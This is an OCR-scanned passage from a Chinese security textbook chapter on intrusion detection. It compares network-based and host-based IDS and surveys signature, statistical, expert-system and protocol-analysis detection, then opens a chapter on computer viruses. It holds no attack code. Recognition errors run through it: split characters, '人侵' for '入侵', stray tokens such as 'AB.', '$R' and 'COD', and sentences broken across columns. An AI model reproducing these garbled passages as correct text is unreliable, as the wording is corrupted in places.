一 旦 检测 到 了 攻击 行为 ,IDS 的 响应 模块 就 提供 多 种 选项 以 通知 、 报 警 并 对 攻击 采取 相 
应 的 反应 。 反 应 因 系 统 而 异 , 但 通常 都 包括 通知 管理 员 、 中 断 连接 /法 庭 分 析 和 证 据 收 集 而 
做 的 会 话 记录 。 

基于 网 络 的 IDS 已 经 广泛 成 为 安全 策略 的 实施 中 的 重要 组 件 , 它 有 许多 仅 靠 基于 主机 
的 人 侵 检测 法 无 法 提供 的 优点 。 

(1) 拥有 成 本 较 低 。 基 于 网 络 的 IDS 可 在 几 个 关键 访问 点 上 进行 策略 配置 ,以 观察 发 
往 多 个 系统 的 网 络 通信 。 所 以 它 不 要 求 在 许多 主机 上 装载 并 管理 软件 。 由 于 需 监 测 的 点 较 
少 ,因此 对 于 一 个 公司 的 环境 来 说 ,拥有 成 本 很 低 。 

(2) 检测 基于 主机 的 系统 漏 掉 的 攻击 。 基 于 网 络 的 IDS 检查 所 有 包 的 头 部 从 而 发 现 亚 
意 的 和 可 疑 的 行动 迹象 。 基 于 主机 的 IDS 无 法 查看 包 的 头 部 ,所 以 它 无 法 检测 到 这 一 类 型 
的 攻击 。 例 如 ,许多 来 自 于 IP 地 址 的 拒绝 服务 型 和 碎片 型 攻击 只 能 在 它们 经 过 网 络 时 ,都 
可 以 在 基于 网 络 的 IDS 中 通过 实时 监测 包 流 而 被 发 现 。 


基于 网 络 的 IDS 可 以 检查 有 效 负 载 的 内 容 ,查找 用 于 特定 攻击 的 指令 或 语法 。 例 如 ， 
通过 检查 数据 包 有 效 负载 可 以 查 到 黑客 软件 ,而 使 正在 寻找 系统 漏洞 的 攻击 者 毫 无 察 
觉 。 由 于 基于 主机 的 系统 不 检查 有 效 负载 ,所 以 不 能 辨认 有 效 负载 中 所 包含 的 攻击 
信息 。 

(3) 攻击 者 不 易 转 移 证 据 。 基 于 网 络 的 IDS 使 用 正在 发 生 的 网 络 通信 进行 实时 攻击 
的 检测 。 所 以 攻击 者 无 法 转移 证 据 。 被 捕获 的 数据 不 仅 包括 攻击 的 方法 ,而 且 还 包括 可 
识别 的 入 侵 者 身份 及 对 其 进行 起 诉 的 信息 。 许 多 入 侵 者 都 熟知 审计 记录 ,他 们 知道 如 何 
操纵 这 些 文件 掩盖 他 们 的 和 人 侵 痕 迹 ,来 阻止 需要 这 些 信 息 的 基于 主机 的 IDS 去 检测 
AB. 

(4) 实时 检测 和 响应 。 基 于 网 络 的 IDS 可 以 在 恶意 及 可 疑 的 攻击 发 生 的 同时 将 其 检测 
出 来 ,并 做 出 更 快 的 通知 和 响应 。 例 如 ,一 个 基于 TCP 的 对 网 络 进 行 的 拒绝 服务 攻击 可 以 
通过 将 基于 网 络 的 IDS 发 出 TCP 复位 信号 ,在 该 攻击 对 目标 主机 造成 破坏 前 ,将 其 中 断 。 
而 基于 主机 的 系统 只 有 在 可 疑 的 登录 信息 被 记录 下 来 以 后 才能 识别 攻击 并 做 出 反应 。 而 这 
时 关键 系统 可 能 早 就 遭 到 了 破坏 ,或 是 运行 基于 主机 的 IDS 的 系统 已 被 摧毁 。 实 时 IDS 可 
根据 预定 义 的 参数 做 出 快速 反应 ,这 些 反 应 包括 将 攻击 设 为 监视 模式 以 收集 信息 .立即 中 止 

C5) 检测 未 成 功 的 攻击 和 不 良 意图 。 基 于 网 络 的 IDS 增加 了 许多 有 价值 的 数据 ,以 判 
别 不 良 意图 。 即 便 防火 墙 可 以 正在 拒绝 这 些 尝 试 ,位 于 防火 墙 之 外 的 基于 网 络 的 IDS 可 以 
查 出 躲 在 防火 墙 后 的 攻击 意图 。 基 于 主机 的 系统 无 法 查 到 从 未 攻击 到 防火 墙 内 主机 的 未 遂 
攻击 ,而 这 些 丢 失 的 信息 对 于 评估 和 优化 安全 策略 是 至 关 重 要 的 。 

(6) 操作 系统 无 关 性 。 基 于 网 络 的 IDS 作为 安全 监测 资源 ,与 主机 的 操作 系统 无 关 。 
与 之 相 比 ,基于 主机 的 系统 必须 在 特定 的 ,没有 遭 到 破坏 的 操作 系统 中 才能 正常 工作 ,生成 
有 用 的 结果 。 

网 络 人 侵 检 测 系统 有 向 专门 的 设备 发 展 的 趋势 ,安装 这 样 的 一 个 网 络 人 侵 检 测 系统 非 
常 方便 ,只 需 将 定制 的 设备 接 上 电源 ,做 很 少 一 些 配置 ,将 其 连 到 网 络 上 即 可 。 

基于 网 络 人 侵 检 测 系统 有 如 下 的 弱点 。 

(1) 网 络 人 侵 检测 系统 只 检查 它 直 接连 接 网 段 的 通信 ,不 能 检测 在 不 同 网 段 的 网 络 包 。 
在 使 用 交换 以 太 网 的 环境 中 就 会 出 现 监测 范围 的 局 限 。 而 安装 多 台 网 络 人 侵 检测 系统 的 传 
感 器 会 使 部 署 整个 系统 的 成 本 大 大 增加 。 

(2) 网 络 人 侵 检测 系统 为 了 性 能 目标 通常 采用 特征 检测 的 方法 , 它 可 以 检测 出 普通 的 
一 些 攻击 ,而 很 难 实现 一 些 复杂 的 需要 大 量 计算 与 分 析 时 间 的 攻击 检测 。 

(3) 网 络 人 侵 检测 系统 可 能 会 将 大 量 的 数据 传 回 分 析 系 统 中 。 在 一 些 系统 中 监听 特定 
的 数据 包 会 产生 大 量 的 分 析 数据 流量 。 一 些 系统 在 实现 时 采用 一 定 方法 来 减少 传 回 的 数据 
量 ,对 入 侵 判断 的 决策 由 传感器 实现 ,而 中 央 控 制 台 成 为 状态 显示 与 通信 中 心 ,不 再 作为 人 
侵 行为 分 析 器 ,这 样 的 系统 中 的 传感器 协同 工作 能 力 较 弱 。 

(4) 网 络 人 侵 检测 系统 处 理 加 密 的 会 话 过 程 较 困 难 , 目 前 通过 加 密 通 道 的 攻击 尚 不 多 ， 
但 随 着 IPv6 的 普及 ,这 个 问题 会 越 来 越 突出 。 

基于 主机 和 基于 网 络 的 人 侵 检测 系统 的 比较 如 表 5. 1 所 示 。 
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表 5.1 基于 主机 和 基于 网 络 的 入 侵 检 测 系统 的 比较 


基于 网 络 基于 主机 
可 以 检测 到 基于 主机 所 忽略 的 攻击 : DoS, | 可 以 检测 到 基于 网 络 所 忽略 的 攻击 : 来 自 关 键 服 务 器 键 
BackOfice 盘 的 攻击 (内 部 ,不 经 过 网 络 ) 
攻击 者 更 难 抹 去 攻击 的 证 据 可 以 事后 比较 成 功 和 失败 的 攻击 
实时 检测 并 响应 接近 实时 检测 和 响应 
检测 不 成 功 的 攻击 和 恶意 企图 监测 系统 特定 的 行为 
独立 于 操作 系统 很 好 地 适应 加 密 和 交换 网 络 环境 
可 以 监测 活动 的 会 话 情况 不 能 
给 出 网 络 原始 数据 的 日 志 不 能 
终止 TCP 连接 终止 用 户 的 登录 
重新 设置 防火 墙 封杀 用 户 账号 
探 针 可 以 分 布 在 整个 网 络 并 向 管理 站 报告 ”| 只 能 保护 配置 引擎 或 代理 的 主机 


3. 混合 人 侵 检 测 系 统 

基于 网 络 的 入侵 检测 系统 和 基于 主机 的 入 侵 检测 系统 都 有 不 足 之 处 ,单纯 使 用 一 类 系 
统 会 造成 主动 防御 体系 不 全 面 。 但 是 ,它们 的 缺憾 是 互补 的 。 如 果 这 两 类 系统 能 够 无 缝 结 
合 起 来 部 署 在 网 络 内 , 则 会 构架 成 一 套 完整 立体 的 主动 防御 体系 ,综合 了 基于 网 络 和 基于 主 
机 两 种 结构 特点 的 入 侵 检 测 系统 , 既 可 发 现 网 络 中 的 攻击 信息 ,也 可 从 系统 日 志 中 发 现 异常 
情况 。 


5.3.3 根据 工作 方式 分 类 


根据 工作 方式 分 为 离线 检测 系统 与 在 线 检测 系统 。 

(1) 离线 检测 系统 : 是 非 实 时 工作 的 系统 , 它 在 事后 分 析 审 计 事 件 , 从 中 检查 入 侵 活 
动 。 事 后 入 侵 检测 由 网 络 管理 人 员 进 行 ,他 们 具有 网 络 安全 的 专业 知识 ,根据 计算 机 系统 对 
用 户 操作 所 做 的 历史 审计 记录 判断 是 否 存在 入 侵 行为 ,如 果 有 就 断 开 连接 ,并 记录 入 侵 证 据 
和 进行 数据 恢复 。 事 后 人 侵 检 测 是 管理 员 定期 或 不 定期 进行 的 ,不 具有 实时 人 性。 

(2) 在 线 检测 系统 : 是 实时 联机 的 检测 系统 , 它 包含 对 实时 网 络 数 据 包 分 析 , 实 时 主机 
审计 分 析 。 其 工作 过 程 是 实时 入 侵 检测 在 网 络 连 接 过 程 中 进行 ,系统 根据 用 户 的 历史 行为 
模型 .存储 在 计算 机 中 的 专家 知识 以 及 神经 网 络 模型 对 用 户 当 前 的 操作 进行 判断 ,一 旦 发 现 
入 侵 迹 象 立即 断 开 入 侵 者 与 主机 的 连接 ,并 收集 证 据 和 实施 数据 恢复 ,这 个 检测 过 程 是 不 断 
循环 进行 的 。 


5.4 ”入侵 检测 方法 


5.4.1 基本 概念 


1. 模式 匹配 

模式 匹配 就 是 将 收集 到 的 信息 与 已 知 的 网 络 入 侵 和 系统 误 用 模式 数据 库 进 行 比较 ,从 
而 发 现 违背 安全 策略 的 行为 。 该 过 程 可 以 很 简单 (如 通过 字符 串 匹 配 以 寻找 一 个 简单 的 条 
目 或 指令 ) ,也 可 以 很 复杂 (如 利用 正规 的 数学 表达 式 来 表示 安全 状态 的 变化 )。 一 般 来 讲 ， 


一 种 进攻 模式 可 以 用 一 个 过 程 (如 执行 一 条 指令 ) 或 一 个 输出 (如 获得 权限 ) 来 表示 。 该 方法 
的 优点 是 只 需 收 集 相 关 的 数据 集合 ,显著 减少 系统 负担 , 且 技 术 已 相当 成 熟 。 它 与 病毒 防火 
墙 采用 的 方法 一 样 ,检测 准确 率 和 效率 都 相当 高 。 但 是 ,该 方法 存在 的 弱点 是 需要 不 断 的 升 
级 以 对 付 不 断 出 现 的 黑客 攻击 手法 ,不 能 检测 到 从 未 出 现 过 的 黑客 攻击 手段 。 

2. 统计 分 析 

统计 分 析 方 法 首先 给 系统 对 象 (如 用 户 .文件 .目录 和 设备 等 ) 创 建 一 个 统计 描述 ,统计 
正常 使 用 时 的 一 些 测量 属性 (如 访问 次 数 、 操 作 失败 次 数 和 延 时 等 )。 测 量 属性 的 平均 值 将 
被 用 来 与 网 络 ,系统 的 行为 进行 比较 ,任何 观察 值 在 正常 值 范围 之 外 时 ,就 认为 有 入 侵 发 生 。 
例如 ,统计 分 析 可 能 标识 一 个 不 正常 行为 ,因为 它 发 现 一 个 在 晚 8 点 至 早 6 点 不 登录 的 账户 
却 在 凌晨 2 点 试图 登录 。 其 优点 是 可 检测 到 未 知 的 入 侵 和 更 为 复杂 的 入 侵 ; 缺点 是 误 报 、 
漏 报 率 高 , 且 不 适应 用 户 正 常 行为 的 突然 改变 。 具 体 的 统计 分 析 方 法 如 基于 专家 系统 、 基 于 
模型 推理 和 基于 神经 网 络 的 分 析 方法 ,目前 正 处 于 研究 热点 和 迅速 发 展 中 。 

3. 完整 性 分 析 

完整 性 分 析 主 要 关注 某 个 文件 或 对 象 是 否 被 更 改 , 这 经 常 包 括 文件 和 目录 的 内 容 及 属 
性 , 它 在 发 现 被 更 改 的 .被 特 络 伊 化 的 应 用 程序 方面 特别 有 效 。 完 整 性 分 析 使 用 消息 摘要 函 
数 ( 如 MD5), 它 能 识别 哪怕 是 微小 的 变化 。 其 优点 是 不 管 模式 匹配 方法 和 统计 分 析 方 法 能 
否 发 现 入 侵 , 只 要 是 成 功 的 攻击 导致 了 文件 或 其 他 对 象 的 任何 改变 , 它 都 能 够 发 现 ; 缺点 是 
一 般 以 批 处 理 方式 实现 ,不 用 于 实时 响应 。 尽 管 如 此 ,完整 性 检测 方法 还 应 该 是 网 络 安全 产 
品 的 必要 手段 之 一 。 例 如 ,可 以 在 每 一 天 的 某 个 特定 时 间 内 开启 完整 性 分 析 模 块 , 对 网 络 系 
统 进行 全 面 地 扫描 检查 。 


5.4.2. 入 侵 检 测 技 术 检 测 方 法 


可 以 采用 概率 统计 方法 、 专 家 系统 、 神 经 网 络 、 模 式 匹 配 \ 行 为 分 析 等 来 实现 入侵 检测 系 
统 的 检测 机 制 ,以 分 析 事件 的 审计 记录 、 识 别 特定 的 模式 .生成 检测 报告 和 最 终 的 分 析 结果 。 

1. 特征 检测 

特征 检测 对 已 知 的 攻击 或 人 侵 的 方式 做 出 确定 性 的 描述 ,形成 相应 的 事件 模式 。 当 被 
审计 的 事件 与 已 知 的 入 侵 事件 模式 相 匹 配 时 , 即 报警 。 原 理 上 与 专家 系统 相仿 。 其 检测 方 
法 上 与 计算 机 病毒 的 检测 方式 类 似 。 目 前 基于 对 包 特 征 描述 的 模式 匹配 应 用 较为 广泛 。 

该 方法 预报 检测 的 准确 率 较 高 ,但 对 于 无 经 验 知识 的 入 侵 与 攻击 行为 无 能 为 力 。 

2. 统计 检测 

统计 模型 常用 异常 检测 ,在 统计 模型 中 常用 的 测量 参数 包括 : 审计 事件 的 数量 ,间隔 时 
间 、 资 源 消耗 情况 等 。 下 面 是 常用 的 入 侵 检 测 5 种 统计 模型 。 

(1) 操作 模型 : 假设 异常 可 通过 测量 结果 与 一 些 固 定 指标 相 比 较 得 到 ,固定 指标 可 以 
根据 经 验 值 或 一 段 时 间 内 的 统计 平均 得 到 ,例如 ,在 短 时 间 内 的 多 次 失败 的 登录 很 有 可 能 是 
口令 尝试 攻击 。 

D 方差 : 计算 参数 的 方差 , 设 定 其 置信 区 间 , 当 测 量 值 超过 置信 区 间 的 范围 时 表明 有 
可 能 是 异常 。 

(3) 多 元 模型 : 操作 模型 的 扩展 ,通过 同时 分 析 多 个 参数 实现 检测 。 

(4) 马尔 柯 夫 过 程 模型 : 将 每 种 类 型 的 事件 定义 为 系统 状态 ,用 状态 转移 和 矩阵 来 表示 
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状态 的 变化 , 当 一 个 事件 发 生 ,或 状态 矩阵 该 转移 的 概率 较 小 时 则 可 能 是 异常 事件 。 

(5) 时 间 序 列 分 析 : 将 事件 计数 与 资源 耗 用 根据 时 间 排 成 序列 ,如 果 一 个 新 事件 在 该 
时 间 发 生 的 概率 较 低 , 则 该 事件 可 能 是 入 侵 。 

这 种 人 侵 检测 方法 是 基于 对 用 户 历 史 行为 建 模 以 及 在 早期 的 证 据 或 模型 的 基础 上 , 审 
计 系 统 实时 的 检测 用 户 对 系统 的 使 用 情况 ,根据 系统 内 部 保存 的 用 户 行为 概率 统计 模型 进 
行 检测 , 当 发 现 有 可 疑 的 用 户 行为 发 生 时 ,保持 跟踪 并 监测 、 记 录 该 用 户 的 行为 。 系 统 要 根 
据 每 个 用 户 以 前 的 历史 行为 ,生成 每 个 用 户 的 历史 行为 记录 库 , 当 用 户 改 变 他 们 的 行为 习惯 
时 ,这 种 异常 就 会 被 检测 出 来 。 

统计 方法 的 最 大 优点 是 可 以 “学 习 ” 用 户 的 使 用 习惯 ,从 而 具有 和 较 高 检 出 率 与 可 用 性 。 
但 是 它 的 "学 习 ” 能 力也 给 入 侵 者 通过 逐步 训练 使 人 侵 事件 符合 正常 操作 的 统计 规律 ,从 
而 透 过 入 侵 检测 系统 。 

3. 专家 系统 

用 专家 系统 对 人 侵 进 行 检 测 ,经 常 是 针对 有 特征 入 侵 行 为 。 所 谓 的 规则 , 即 是 知识 ,不 
同 的 系统 与 设置 具有 不 同 的 规则 , 且 规则 之 间 往 往 无 通用 性 。 专 家 系统 的 建立 依赖 于 知识 
库 的 完备 性 ,知识 库 的 完备 性 又 取决 于 审计 记录 的 完备 性 与 实时 性 。 入 侵 的 特征 抽取 与 表 
达 , 是 入 侵 检 测 专家 系统 的 关键 。 在 系统 实现 中 ,将 有 关 入 侵 的 知识 转化 为 if-then 结构 (也 
可 以 是 复合 结构 ) ,if 部 分 为 人 侵 特 征 ,then 部 分 是 系统 防范 措施 。 运 用 专家 系统 防范 有 特 
征 人 侵 行 为 的 有 效 性 完全 取决 于 专家 系统 知识 库 的 完备 性 。 

该 技术 根据 安全 专家 对 可 疑 行 为 的 分 析 经 验 来 形成 一 套 推理 规则 ,然后 在 此 基础 上 建 
立 相 应 的 专家 系统 ,由 此 专家 系统 自动 进行 对 所 涉及 入 侵 行 为 的 分 析 工 作 。 该 系统 应 当 能 
够 随 着 经 验 的 积累 而 利用 其 自学 习 能 力 进行 规则 的 扩充 和 修正 。 


5.5 人 入侵 系统 的 分 析 方 式 


1. 基于 知识 的 特征 检测 (模式 发 现 ) 技 术 

特征 检测 又 称 为 误 用 检测 ,是 利用 已 知 系统 和 应 用 软件 的 弱点 攻击 模式 来 检测 入 侵 。 
这 一 检测 假设 入 侵 者 活动 可 以 用 一 种 模式 来 表示 ,系统 的 目标 是 检测 主体 活动 是 否 符合 这 
些 模式 ,那么 所 有 已 知 的 人 侵 方法 都 可 以 用 匹配 的 方法 发 现 。 模 式 发 现 的 关键 是 如 何 表达 
入 侵 的 模式 ,把 真正 的 人 侵 与 正常 行为 区 分 开 来 。 需 要 的 计算 量 将 是 : 攻击 特征 字 节 数 X 
数据 包 字 节 数 X 每 秒 的 数据 包 数 XX 数据 库 的 攻击 特征 数 。 对 于 满 负 载 的 100Mbps 以 太 网 ， 
所 需 的 计算 量 极其 巨大 。 模 式 匹 配 /特征 搜索 技术 使 用 固定 的 特征 模式 来 探测 攻击 ,只 能 探 
测 出 明确 的 、 唯 一 的 攻击 特征 ,即便 是 基于 最 轻微 变换 的 攻击 串 都 会 被 忽略 。 

IDS 中 的 特征 通常 分 为 来 自 保留 IP 地 址 的 连接 企图 (通过 检查 IP 报头 的 来 源 地 址 识 
别 ); 含有 特殊 病毒 信息 的 E-mail( 通 过 对 比 每 封 E-mail 的 主题 信息 和 病态 E-mail 的 主题 
信息 来 识别 ,或 者 通过 搜索 特定 名 字 的 附近 来 识别 ); 未 登录 情况 下 使 用 文件 和 目录 命令 对 
FTP 服务 器 的 文件 访问 攻击 (通过 创建 具备 状态 跟踪 的 特征 样板 以 监视 成 功 登 录 的 FTP 
对 话 发 现 未 经 验证 却 发 命令 的 入 侵 企 图 ) 等 。 

模式 发 现 的 优点 是 误 报 较 少 ; 缺点 是 它 只 能 发 现 已 知 的 攻击 ,对 未 知 的 攻击 无 能 为 力 ， 
同时 由 于 新 的 攻击 方法 不 断 产 生 、 新 漏洞 不 断 发 现 , 攻 击 特征 库 如 果 不 能 及 时 更 新 也 将 造成 


IDS 漏 报 。 

2. 基于 行为 的 异常 检测 (异常 发 现 ) 技 术 

通过 将 过 去 观察 到 的 正常 行为 与 受到 攻击 时 的 行为 加 以 比较 ,根据 使 用 者 的 异常 行为 
或 资源 的 异常 使 用 状况 来 判断 是 否 发 生 入 侵 活动 ,其 原则 是 任何 与 已 知行 为 模型 不 符合 的 
行为 都 认为 是 入 侵 行为 。 

异常 检测 的 假设 是 入 侵 者 活动 异常 于 正常 主体 的 活动 。 这 种 活动 存在 4 种 可 能 : 入 侵 
性 而 非 异 常 . 非 人 侵 性 且 异 常 . 非 人 侵 性 且 非 异常 .人 侵 且 异常 。 如 果 能 够 建立 系统 正常 行 
为 的 轨迹 ,那么 理论 上 可 以 把 所 有 与 正常 轨迹 不 同 的 系统 状态 视 为 可 疑 企图 。 根 据 这 一 理 
念 建立 主体 正常 活动 的 “活动 简 档 ”, 将 当前 主体 的 活动 状况 与 “活动 简 档 " 相 比 较 , 当 违反 其 
统计 规律 时 ,认为 该 活动 可 能 是 入 侵 行为 。 

异常 检测 的 优点 是 可 以 发 现 未 知 的 入 侵 行为 ,同时 有 一 定 的 学 习 能 力 。 

异常 检测 的 难题 在 于 如 何 建 立 “ 活 动 简 档 ”以 及 如 何 设计 统计 算法 ,从 而 不 把 正常 的 操 
作 作 为 "和 人 侵 ”( 误 报 ) 或 忽略 真正 的 “入侵 ” 行 为 ( 漏 报 )。 对 于 异常 阁 值 与 特征 的 选择 是 异常 
发 现 技 术 的 关键 。 例 如 ,通过 流量 统计 分 析 将 异常 时 间 的 异常 网 络 流量 视 为 可 疑 。 异常 发 
现 技术 的 局 限 是 并 非 所 有 的 入 侵 都 表现 为 异常 ,而 且 系 统 的 轨迹 难于 计算 和 更 新 。 例 如 , 当 
用 户 合法 的 改变 行为 模式 时 (如 使 用 新 的 应 用 程序 ) 系 统 会 误 报 ; 入 侵 者 可 通过 对 正常 行为 
模式 缓慢 的 偏离 使 系统 逐渐 适应 使 系统 漏 报 ; 对 于 新 用 户 ,系统 的 学 习 阶段 何 时 结束 不 易 
确定 ,同时 在 该 阶段 难以 对 用 户 进行 正常 的 检测 。 另 外 ,大 多 IDS 是 基于 单 包 检 查 的 ,协议 
分 析 得 不 够 ,因此 无 法 识别 伪装 或 变形 的 网 络 攻击 ,也 造成 大 量 漏 报 和 误 报 。 

3. 协议 分 析 技术 

在 协议 分 析 中 ,网络 人 侵 检测 系统 的 传感器 检查 TCP 和 UDP 的 有 效 荷载 , 且 可 以 将 其 
完全 解码 。 协 议 分析 提 供 了 一 种 高 级 的 网 络 入 侵 解决 方案 ,可 以 检测 更 广泛 的 攻击 ,包括 已 
知 和 未 知 的 。 
协议 分 析 可 以 在 不 同 的 应 用 协议 上 (如 Telnet, FTP, HTTP,SMTP,SNMP,DNS 等 ) 
对 每 一 个 用 户 命令 做 出 详细 分 析 , 如 果 出 现 TP 碎片 设置 ,数据 包 将 首先 被 重 装 ,然后 详细 分 析 
来 了 解 潜 在 的 攻击 行为 。 通 过 重 装 数据 包 , 系统 可 以 检测 到 利用 TDS 逃避 技术 的 攻击 手段 。 
协议 分 析 与 命令 解析 带 来 的 好 处 还 包括 : 当 系 统 提升 协议 栈 来 解析 每 一 层 时 , 它 用 已 
获得 的 知识 来 消除 在 数据 包 结 构 中 不 可 能 出 现 的 攻击 。 例 如 4 层 协议 是 TCP , 那 就 不 用 再 
搜索 其 他 第 4 层 协议 如 UDP 上 形成 的 攻击 。 如 果 数 据 包 最 高 层 是 SNMP , 那 就 不 用 再 寻 
$R Telnet 或 HTTP 攻击 。 这 样 做 的 结果 是 性 能 得 到 明显 改善 。 
协议 解析 也 大 大 降低 了 模式 匹配 IDS 系统 中 常见 的 误 报 现象 。 当 数据 包 的 一 些 字符 
串 符合 攻击 特征 库 时 系统 就 会 报警 ,但 该 字符 串 实际 上 根本 不 是 一 个 攻击 ,这 就 属于 误 报 。 
这 样 的 误 报 不 会 在 基于 协议 分 析 和 命令 解 协 的 IDS 系统 中 发 生 ,因为 它 知道 和 每 个 协议 有 
关 的 潜在 攻击 的 确切 位 置 。 

基于 协议 分 析 和 命令 解析 的 IDS 网 络 传感器 采用 高 性 能 数据 包 驱 动 器 ,使 其 不 仅 支 持 
线 速 百 兆 流量 检测 ,而且 千 兆 网 络 传感器 具有 900 兆 网 络 流量 的 100% 检 测 能 力 , 可 以 支持 
300 万 个 并 发 连接 。 

目前 ,国际 优秀 的 IDS 主要 以 模式 发 现 技 术 为 主 , 并 结合 异常 发 现 ,协议 分 析 技 术 ,并 
且 一 个 完备 的 入 侵 检 测 系统 IDS 一 定 是 基于 主机 和 基于 网 络 两 种 方式 兼备 的 分 布 式 系 统 。 
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网 络 安 全 与 信息 保障 


5.6 入 侵 检 测 发 展 


5.6.1 入 侵 技 术 的 发 展 与 演化 


入 侵 检 测 系统 面临 的 主要 问题 。 

1. 误 报 

误 报 是 指 被 人 侵 检测 系统 测 出 但 其 实 是 正常 及 合法 使 用 受 保护 网 络 和 计算 机 的 警报 。 
假 警报 不 但 令 人 讨厌 ,并 且 降 低 入 侵 检测 系统 的 效率 。 攻 击 者 可 以 而 且 往 往 是 利用 包 结构 
伪造 无 威胁 “正常 " 假 警报 ,以 诱 使 收受 人 把 入侵 检测 系统 关 掉 。 

没有 一 个 人 侵 检测 无 敌 于 误 报 ,应 用 系统 总 会 发 生 错误 ,其 原因 是 : 缺乏 共享 信息 的 标 
准 机制 和 集中 协调 的 机 制 ,不 同 的 网 络 及 主机 有 不 同 的 安全 问题 ,不同 的 人 侵 检测 系统 有 各 
自 的 功能 ; 缺乏 揣摩 数据 在 一 段 时 间 内 行为 的 能 力 ; 缺乏 有 效 跟踪 分 析 等 。 

2. 精巧 及 有 组 织 的 攻击 

攻击 可 以 来 自 四 方 八 面 ,特别 是 一 群 人 组 织 策 划 且 攻击 者 技术 高 超 的 攻击 ,攻击 者 花费 
很 长 时 间 准 备 ,并 发 动 全 球 性 攻击 ,要 找 出 这 样 复杂 的 攻击 是 一 件 难事 。 

另外 ,高 速 网 络 技术 ,尤其 是 交换 技术 以 及 加 密 信道 技术 的 发 展 , 使 得 通过 共享 网 段 监 
听 的 网 络 数据 采集 方法 显得 不 足 , 而 巨大 的 通信 量 对 数据 分 析 也 提出 了 新 的 要 求 。 


5.6.2. 入 侵 检 测 技术 的 主要 发 展 方向 


入 侵 检测 系统 的 发 展 趋势 ,从 总 体 上 讲 , 目 前 除了 完善 常规 的 、 传 统 的 技术 (模式 识别 和 
完整 性 检测 ?外 ,入 侵 检测 系统 应 重点 加 强 与 统计 分 析 相 关 技 术 的 研究 。 许 多 学 者 在 研究 新 
的 检测 方法 ,如 采用 自动 代理 的 主动 防御 方法 ,将 免疫 学 原理 应 用 到 入 侵 检测 的 方法 等 。 其 
主要 发 展 方向 可 以 概括 如 下 。 

1. 分 布 式 人 侵 检 测 与 CIDF 

传统 的 入侵 检测 系统 一 般 局 限于 单一 的 主机 或 网 络 架构 ,对 异 构 系 统 及 大 规模 网 络 的 
检测 明显 不 足 , 同 时 不 同 的 入 侵 检 测 系统 之 间 不 能 协同 工作 。 为 此 ,需要 分 布 式 入 侵 检 测 技 
术 与 CIDF。 

2. 应 用 层 人 侵 检 测 

许多 入 侵 的 语义 只 有 在 应 用 层 才能 理解 ,而 目前 的 入 侵 检测 系统 仅 能 检测 Web 之 类 的 
通用 协议 ,不 能 处 理 如 Lotus Notes 数据 库 系统 等 其 他 的 应 用 系统 。 许 多 基于 客户 /服务 器 
结构 .中 间 件 技术 及 对 象 技术 的 大 型 应 用 ,需要 应 用 层 的 入侵 检测 保护 。 

3. 智能 人 侵 检 测 

目前 ,入 侵 方 法 越 来 越 多 样 化 与 综合 化 ,尽管 已 经 有 智能 体系 、 神 经 网 络 与 遗传 算法 应 
用 在 和 人 侵 检测 领域 ,但 这 些 只 是 一 些 尝 试 性 的 研究 工作 ,需要 对 智能 化 的 入 侵 检测 系统 进 一 
步 研 究 , 以 解决 其 自学 习 能 力 与 自 适 应 能 力 。 

4. 与 网 络 安全 技术 相 结 合 

结合 防火 墙 .PKIX、 安 全 电子 交易 (SET) 等 网 络 安全 与 电子 商务 技术 ,提供 完整 的 网 络 
安全 保障 。 


设计 通用 的 入 侵 检 测 测试 .评估 方法 和 平台 ,实现 对 多 种 人 侵 检测 系统 的 检测 ,已 成 为 


当前 入 侵 检测 系统 的 另 一 个 


要 研究 与 发 展 领域 。 评 价 入 侵 检 测 系统 可 从 检测 范围 ,系统 


资源 占用 、 自 身 的 可 靠 性 等 方面 进行 ,评价 指标 有 : 能 否 保证 自身 的 安全 、 运 行 与 维护 系统 
的 开销 ,报警 准确 率 、 负 载 能 力 以 及 可 支持 的 网 络 类 型 ,支持 的 入侵 特征 数 ,是 否 支持 IP 碎 
片 重组 .是否 支持 TCP 流 重 组 等 。 


总 而 言 之 ,入侵 检测 系统 
和 误 操 作 的 实时 保护 ,在 网 络 
性 的 要 求 越 来 越 高 ,为 给 电子 


作为 一 种 主动 的 安全 防护 技术 ,提供 了 对 内 部 攻击 、 外 部 攻击 
系统 受到 危害 之 前 拦截 和 响应 人 侵 。 随 着 网 络 通信 技术 安全 
商务 等 网 络 应 用 提供 可 靠 服务 ,而 由 于 入 侵 检 测 系统 能 够 从 网 


络 安全 的 立体 纵深 、 多 层次 防御 的 角度 出 发 提供 安全 服务 , 必 将 进一步 受到 人 们 的 高 度 


重视 。 


入 侵 检 测 


How 


第 6 章 病毒 防护 技术 


6.1 病毒 防护 技术 概述 


计算 机 病毒 (Computer Virus) 在 (中 华人 民 共 和 国 计 算 机 信息 系统 安全 保护 条 例 》 中 的 
定义 是 “ 指 编制 或 者 在 计算 机 程序 中 插入 的 破坏 计算 机 功能 或 者 破坏 数据 ,影响 计算 机 使 用 
并 且 能 够 自我 复制 的 一 组 计算 机 指令 或 者 程序 代码 ”。 病 毒 必须 满足 以 下 两 个 条 件 。 

COD 必须 能 自行 执行 。 它 通常 将 自己 的 代码 置 于 另 一 个 程序 的 执行 路 径 中 。 

(2) 必须 能 自我 复制 。 它 可 能 用 受 病毒 感染 的 文件 副本 替换 其 他 可 执行 文件 。 病 毒 既 
可 以 感染 个 人 计算 机 也 可 以 感染 网 络 服务 器 。 

此 外 ,病毒 往往 还 具有 很 强 的 感染 性 ,一 定 的 潜伏 性 、 特 定 的 触发 性 和 很 大 的 破坏 性 等 ， 
由 于 计算 机 所 具有 的 这 些 特点 与 生物 学 上 的 病毒 有 相似 之 处 ,因此 人 们 才 将 这 种 恶意 程序 
代码 称 为 计算 机 病毒 。 一 些 病毒 被 设计 为 通过 损坏 程序 、 删 除 文件 或 重新 格式 化 硬盘 来 损 
坏 计算 机 系统 。 有 些 病毒 不 损坏 计算 机 系统 ,而 只 是 复制 自身 ,并 通过 显示 文本 ,视频 和 音 
频 消 息 表明 它们 的 存在 。 即 使 是 这 些 良 性 病毒 也 会 给 计算 机 用 户 带 来 问题 。 通 常 它们 会 占 
据 合 法 程序 使 用 的 计算 机 内 存 。 结 果 , 会 引起 操作 异常 ,甚至 导致 系统 崩溃 。 另 外 ,许多 病 
毒 包含 大 量 错误 ,这些 错误 可 能 导致 系统 崩溃 和 数据 丢失 。 


6.2 计算 机 病毒 


1. 蠕虫 病毒 简介 

蠕虫 病毒 和 一 般 的 病毒 有 着 很 大 的 区 别 。 对 于 蠕虫 ,一 般 认 为 ,蠕虫 是 一 种 通过 网 络 传 
